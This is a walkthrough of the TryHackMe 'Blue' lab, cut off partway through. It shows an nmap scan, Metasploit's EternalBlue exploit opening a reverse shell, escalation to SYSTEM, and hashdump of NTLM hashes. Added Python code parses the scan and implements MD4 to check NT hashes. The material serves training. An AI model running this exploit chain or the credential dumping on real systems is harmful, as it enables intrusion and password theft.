TryHackMe - Blue

Prerequisite

$ export IP=THM_VPN_IP

TASK 1 - RECON

1. Scan the machine

The command below kicks off the nmap scan with default scripts and version detection, writing the output in all formats (-oA) into a portScan directory.

$ sudo nmap -sC -sV -vvv -oA ./portScan/nmap-initial $IP
Nmap scan report for 10.10.0.135
Host is up, received echo-reply ttl 127 (0.050s latency).
Scanned at 2020-04-12 12:48:35 BST for 137s
Not shown: 991 closed ports
Reason: 991 resets
PORT      STATE SERVICE      REASON          VERSION
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack ttl 127 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped   syn-ack ttl 127
|_ssl-date: 2020-04-12T11:49:53+00:00; +1s from scanner time.
49152/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49158/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49159/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h15m01s, deviation: 2h30m00s, median: 0s
| nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:09:52:93:bf:3a (unknown)
| Names:
|   JON-PC<00>           Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   JON-PC<20>           Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| Statistics:
|   02 09 52 93 bf 3a 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 62444/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 34185/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 22744/udp): CLEAN (Timeout)
|   Check 4 (port 44981/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-04-12T06:49:38-05:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-12T11:49:38
|_  start_date: 2020-04-12T09:42:45
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 12 12:50:52 2020 -- 1 IP address (1 host up) scanned in 137.96 seconds

2. How many ports are open with a port number under 1000?

135/tcp
139/tcp
445/tcp

The correct answer for this question was 3.
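Counting and triaging this by hand works for one host, but the same questions come up for every scan, so here is an added Python example (my own code, not part of the original writeup or of nmap) that parses the normal .nmap output written by -oA, counts the open ports below 1000 and pulls the SMB security posture out of the host script results. The embedded sample is a trimmed copy of the scan output above. The function and variable names are my own. The MS17-010 line it emits is a reminder to check patch status on an SMB-exposed Windows 7 host, not a vulnerability check; the smb_ms17_010 scanner that Metasploit runs later in the room is what actually confirms exposure.

```python
import re

# Sample input: a trimmed copy of the normal (.nmap) output from the scan above.
# -oA also writes .gnmap and .xml; this parser reads the human-readable form.
SAMPLE_NMAP = """\
PORT      STATE SERVICE      REASON          VERSION
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack ttl 127 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped   syn-ack ttl 127
49152/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
Host script results:
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

# port/proto, state, service: the first four columns of an nmap port line
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def open_ports(text):
    """Return (port, proto, service) for every port line nmap reports as open."""
    found = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m and m.group(3) == "open":
            found.append((int(m.group(1)), m.group(2), m.group(4)))
    return found


def count_below(ports, limit=1000):
    """Answer to the room's 'open ports under 1000' question."""
    return sum(1 for port, _, _ in ports if port < limit)


def smb_findings(text):
    """Triage notes a defender would raise from the SMB host-script output."""
    notes = []
    os_m = re.search(r"^\|\s+OS: (.+)$", text, re.M)
    os_name = os_m.group(1).strip() if os_m else "unknown"
    notes.append("os: " + os_name)
    # smb-security-mode reports disabled / supported / required for SMBv1 signing
    sig = re.search(r"message_signing: (\w+)", text)
    if sig and sig.group(1) != "required":
        notes.append("smb1-signing: " + sig.group(1))
    if "Message signing enabled but not required" in text:
        notes.append("smb2-signing: not required")
    smb_open = any(port == 445 for port, _, _ in open_ports(text))
    if smb_open and os_name.startswith("Windows 7"):
        notes.append("smbv1 reachable on Windows 7: confirm MS17-010 patch status, disable SMBv1")
    return notes


if __name__ == "__main__":
    ports = open_ports(SAMPLE_NMAP)
    print(f"{len(ports)} open ports, {count_below(ports)} below 1000")
    for note in smb_findings(SAMPLE_NMAP):
        print(" -", note)
```

Run against the real file with open("./portScan/nmap-initial.nmap").read() in place of SAMPLE_NMAP. The signing findings are the ones a defender should act on regardless of the patch level: with signing not required, an attacker on the same network segment can relay SMB authentication, so "disabled (dangerous, but default)" deserves a ticket on its own.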

3. What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

As this machine is called Blue, it was safe to assume the answer would be EternalBlue, which is:

ms17-010

TASK 2 - GAIN ACCESS

1. Start Metasploit

$ sudo msfdb run

2. Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........).

Within Metasploit we search for eternalblue to list all the matching modules.

msf5 > search eternalblue
Matching Modules
================
   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

As can be seen above, there are four exploit modules (#2-5).

The correct answer for this question was #2.

exploit/windows/smb/ms17_010_eternalblue

3. Show options and set the one required value. What is the name of this value? (All caps for submission). Following on from the above command we can determine the answer.

msf5 > use 2
msf5 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) >

The answer appears to be RHOSTS; however, when entering this into the submission box it was marked incorrect. The answer they were looking for was RHOST, the name this option had in older Metasploit releases, maybe this was just a glitch in the matrix??

4. Run the exploit.

Before running the exploit we need to set RHOSTS (the target) and LPORT (the port our reverse handler listens on).

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS  THM_VPN_IP
RHOSTS => THM_VPN_IP
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
LPORT => 4444

Carrying on our command workflow we attempt to exploit the machine.

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on THM_VPN_IP:4444
[*] THM_VPN_IP:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] THM_VPN_IP:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] THM_VPN_IP:445      - Scanned 1 of 1 hosts (100% complete)
[*] THM_VPN_IP:445 - Connecting to target for exploitation.
[+] THM_VPN_IP:445 - Connection established for exploitation.
[+] THM_VPN_IP:445 - Target OS selected valid for OS indicated by SMB reply
[*] THM_VPN_IP:445 - CORE raw buffer dump (42 bytes)
[*] THM_VPN_IP:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] THM_VPN_IP:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] THM_VPN_IP:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] THM_VPN_IP:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] THM_VPN_IP:445 - Trying exploit with 12 Groom Allocations.
[*] THM_VPN_IP:445 - Sending all but last fragment of exploit packet
[*] THM_VPN_IP:445 - Starting non-paged pool grooming
[+] THM_VPN_IP:445 - Sending SMBv2 buffers
[+] THM_VPN_IP:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] THM_VPN_IP:445 - Sending final SMBv2 buffers.
[*] THM_VPN_IP:445 - Sending last fragment of exploit packet!
[*] THM_VPN_IP:445 - Receiving response from exploit packet
[+] THM_VPN_IP:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] THM_VPN_IP:445 - Sending egg to corrupted connection.
[*] THM_VPN_IP:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (THM_VPN_IP:4444 -> 10.1.0.135:49175) at 2020-04-12 13:50:08 +0100
[+] THM_VPN_IP:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] THM_VPN_IP:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] THM_VPN_IP:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

C:\Windows\system32>^Z
Background session 1? [y/N]  y

5. Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.

The shell came through blank; however, after pressing RETURN the DOS prompt of the exploited machine appears, as shown above.

TASK 3 - ESCALATION

1. If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected).

C:\Windows\system32>^Z
Background session 1? [y/N]  y

msf5 > grep meterpreter search shell
   273  payload/android/meterpreter_reverse_http                                            normal     No     Android Meterpreter Shell, Reverse HTTP Inline
   274  payload/android/meterpreter_reverse_https                                           normal     No     Android Meterpreter Shell, Reverse HTTPS Inline
   275  payload/android/meterpreter_reverse_tcp                                             normal     No     Android Meterpreter Shell, Reverse TCP Inline
   439  payload/osx/x64/meterpreter/bind_tcp                                                normal     No     OSX Meterpreter, Bind TCP Stager
   440  payload/osx/x64/meterpreter/reverse_tcp                                             normal     No     OSX Meterpreter, Reverse TCP Stager
   459  payload/python/meterpreter_bind_tcp                                                 normal     No     Python Meterpreter Shell, Bind TCP Inline
   460  payload/python/meterpreter_reverse_http                                             normal     No     Python Meterpreter Shell, Reverse HTTP Inline
   461  payload/python/meterpreter_reverse_https                                            normal     No     Python Meterpreter Shell, Reverse HTTPS Inline
   462  payload/python/meterpreter_reverse_tcp                                              normal     No     Python Meterpreter Shell, Reverse TCP Inline
   482  payload/windows/meterpreter/bind_hidden_ipknock_tcp                                 normal     No     Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
   483  payload/windows/meterpreter/bind_hidden_tcp                                         normal     No     Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
   484  payload/windows/meterpreter_bind_named_pipe                                         normal     No     Windows Meterpreter Shell, Bind Named Pipe Inline
   485  payload/windows/meterpreter_bind_tcp                                                normal     No     Windows Meterpreter Shell, Bind TCP Inline
   486  payload/windows/meterpreter_reverse_http                                            normal     No     Windows Meterpreter Shell, Reverse HTTP Inline
   487  payload/windows/meterpreter_reverse_https                                           normal     No     Windows Meterpreter Shell, Reverse HTTPS Inline
   488  payload/windows/meterpreter_reverse_ipv6_tcp                                        normal     No     Windows Meterpreter Shell, Reverse TCP Inline (IPv6)
   489  payload/windows/meterpreter_reverse_tcp                                             normal     No     Windows Meterpreter Shell, Reverse TCP Inline
   492  payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp                          normal     No     Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
   493  payload/windows/patchupmeterpreter/bind_hidden_tcp                                  normal     No     Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
   524  payload/windows/x64/meterpreter_bind_named_pipe                                     normal     No     Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
   525  payload/windows/x64/meterpreter_bind_tcp                                            normal     No     Windows Meterpreter Shell, Bind TCP Inline (x64)
   526  payload/windows/x64/meterpreter_reverse_http                                        normal     No     Windows Meterpreter Shell, Reverse HTTP Inline (x64)
   527  payload/windows/x64/meterpreter_reverse_https                                       normal     No     Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
   528  payload/windows/x64/meterpreter_reverse_ipv6_tcp                                    normal     No     Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
   529  payload/windows/x64/meterpreter_reverse_tcp                                         normal     No     Windows Meterpreter Shell, Reverse TCP Inline x64
   566  post/multi/manage/shell_to_meterpreter                                              normal     No     Shell to Meterpreter Upgrade
msf5 >

The module required to upgrade a standard shell to a meterpreter session is post/multi/manage/shell_to_meterpreter.

2. Select this (use MODULE_PATH). Show options, what option are we required to change? (All caps for answer).

Carrying on our command workflow we select the correct module and list the options.

msf5 > use 566
msf5 post(multi/manage/shell_to_meterpreter) > options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on.
msf5 post(multi/manage/shell_to_meterpreter) >

The option required for this module to function is SESSION.

3. Set the required option, you may need to list all of the sessions to find your target here.

msf5 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                                       Connection
  --  ----  ----                     -----------                                                                       ----------
  1         shell x64/windows        Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  THM_VPN_IP:4444 -> 10.10.55.106:49175 (10.10.55.106)

msf5 post(multi/manage/shell_to_meterpreter) > set SESSION 1

SESSION => 1

4. Run! If this doesn't work, try completing the exploit from the previous task once more.

msf5 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on THM_VPN_IP:4433
[*] Post module execution completed
msf5 post(multi/manage/shell_to_meterpreter) >
[*] Sending stage (180291 bytes) to THM_VPN_IP
[*] Meterpreter session 2 opened (THM_VPN_IP:4433 -> 10.1.0.135:49171) at 2020-04-12 14:52:56 +0100
[*] Stopping exploit/multi/handler

msf5 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                                       Connection
  --  ----  ----                     -----------                                                                       ----------
  1         shell x64/windows        Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  THM_VPN_IP:4444 -> 10.1.0.135:49168 (10.10.27.96)
  2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ JON-PC                                                      THM_VPN_IP:4433 -> 10.1.0.135:49171 (10.10.27.96)

5. Once the meterpreter shell conversion completes, select that session for use.

msf5 post(multi/manage/shell_to_meterpreter) > sessions -h
Usage: sessions [options] or sessions [id]

Active session manipulation and interaction.

OPTIONS:

    -C <opt>  Run a Meterpreter Command on the session given with -i, or all
    -K        Terminate all sessions
    -S <opt>  Row search filter.
    -c <opt>  Run a command on the session given with -i, or all
    -d        List all inactive sessions
    -h        Help banner
    -i <opt>  Interact with the supplied session ID
    -k <opt>  Terminate sessions by session ID and/or range
    -l        List all active sessions
    -n <opt>  Name or rename a session by ID
    -q        Quiet mode
    -s <opt>  Run a script or module on the session given with -i, or all
    -t <opt>  Set a response timeout (default: 15)
    -u <opt>  Upgrade a shell to a meterpreter session on many platforms
    -v        List all active sessions in verbose mode
    -x        Show extended information in the session table

Many options allow specifying session ranges using commas and dashes.
For example:  sessions -s checkvm -i 1,3-5  or  sessions -k 1-2,5,6

msf5 post(multi/manage/shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                                                                       Connection
  --  ----  ----                     -----------                                                                       ----------
  1         shell x64/windows        Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  THM_VPN_IP:4444 -> 10.1.0.135:49168 (10.10.81.119)
  2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ JON-PC                                                      THM_VPN_IP:4433 -> 10.1.0.135:49172 (10.10.81.119)

msf5 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...

meterpreter >

6. Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > shell
Process 1120 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

7. List all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).

C:\Windows\system32>^Z
Background channel 1? [y/N]  y
meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                x64   0
 416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 444   704   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 556   548   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 604   548   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 616   596   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 656   596   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 704   604   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 712   604   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 720   604   lsm.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
 772   704   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 828   704   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 896   704   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 944   704   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1012  656   LogonUI.exe           x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\LogonUI.exe
 1076  704   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1120  2520  cmd.exe               x86   0        NT AUTHORITY\SYSTEM           C:\Windows\SysWOW64\cmd.exe
 1156  704   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1292  704   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1336  704   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1388  556   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
 1412  704   amazon-ssm-agent.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
 1476  704   LiteAgent.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Xentools\LiteAgent.exe
 1596  704   TrustedInstaller.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\servicing\TrustedInstaller.exe
 1612  704   Ec2Config.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
 1724  772   WMIADAP.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wbem\WMIADAP.exe
 1936  704   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 2044  1292  cmd.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\cmd.exe
 2056  772   taskeng.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\taskeng.exe
 2060  828   WmiPrvSE.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wbem\WmiPrvSE.exe
 2068  828   WmiPrvSE.exe          x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe
 2160  556   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
 2392  2384  powershell.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 2520  2392  powershell.exe        x86   0        NT AUTHORITY\SYSTEM           C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
 2600  704   vds.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\vds.exe
 2640  556   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
 2760  704   mscorsvw.exe          x86   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
 2784  704   mscorsvw.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
 2820  704   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 2852  704   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\sppsvc.exe
 2892  704   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2952  704   SearchIndexer.exe     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe

meterpreter >

8. Migrate to this process using the 'migrate PROCESS_ID' command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.

meterpreter > migrate 2892
[*] Migrating from 2520 to 2892...
[*] Migration completed successfully.
meterpreter >

TASK 4 - CRACKING

1. Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
meterpreter >

2. Copy this password hash to a file and research how to crack it. What is the cracked password?

We first need to clean up the hash to match the format hashcat expects (hashcat's example hashes page shows the expected input for each mode). Basically, we keep only the NT hash, which is the fourth colon-separated field of the hashdump line, and drop everything else including every colon.

Original - HASH

Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

Hashcat - HASH

ffb43f0de35be4d9917ac0cc8ad57f8d

To confirm the hash is correct we can use hashid, note we are feeding in the modified hash which is saved in a file (ntlm.txt).

> hashid -m < ntlm.txt
Analyzing 'ffb43f0de35be4d9917ac0cc8ad57f8d'
[+] MD2
[+] MD5 [Hashcat Mode: 0]
[+] MD4 [Hashcat Mode: 900]
[+] Double MD5 [Hashcat Mode: 2600]
[+] LM [Hashcat Mode: 3000]
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5 [Hashcat Mode: 8600]
[+] Skype [Hashcat Mode: 23]
[+] Snefru-128
[+] NTLM [Hashcat Mode: 1000]
[+] Domain Cached Credentials [Hashcat Mode: 1100]
[+] Domain Cached Credentials 2 [Hashcat Mode: 2100]
[+] DNSSEC(NSEC3) [Hashcat Mode: 8300]
[+] RAdmin v2.x [Hashcat Mode: 9900]
> 

hashid cannot tell the 32-hex-character formats apart, but NTLM is among the matches, so the hash appears to be correct, and the -m switch of hashid also shows the mode we need to use for hashcat, 1000.
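hashid lists both MD4 and NTLM because an NT hash is simply MD4 over the UTF-16LE encoding of the password, with no salt, which is also why every candidate in rockyou can be tested so quickly. The following added Python example (my own code, not from the writeup, hashid or hashcat) parses the pwdump-style hashdump lines above into their fields, flags the two well-known empty-password values, produces the bare NT hash that goes into ntlm.txt for -m 1000, and verifies a single candidate password against a hash. MD4 is implemented in pure Python from RFC 1320 because hashlib's md4 depends on OpenSSL's legacy provider and is missing on many current systems; the function and field names are my own.

```python
import struct

# Sample input: the three hashdump lines shown above, in pwdump format
# (user:RID:LM-hash:NT-hash:::). Only Jon's NT hash is the one the room cracks;
# the other two are the well-known "empty password" values.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
"""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": LM hashing disabled / not stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "": MD4 of the empty string
MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data):
    """Pure-Python MD4 (RFC 1320): pad, then three 16-step rounds per 64-byte block."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    # (boolean function, message-word order, shift amounts, round constant)
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z),
         list(range(16)), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, order, shifts, k in rounds:
            for i, j in enumerate(order):
                a = _rotl((a + fn(b, c, d) + x[j] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers so the next step updates the next one
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password):
    """NT hash = MD4 over the UTF-16LE encoding of the password, unsalted."""
    return md4(password.encode("utf-16le")).hex()


def parse_pwdump(line):
    """Split one user:RID:LM:NT::: line into fields plus the audit flags we care about."""
    user, rid, lm, nt = line.strip().rstrip(":").split(":")
    lm, nt = lm.lower(), nt.lower()
    return {
        "user": user,
        "rid": int(rid),
        "lm": lm,
        "nt": nt,
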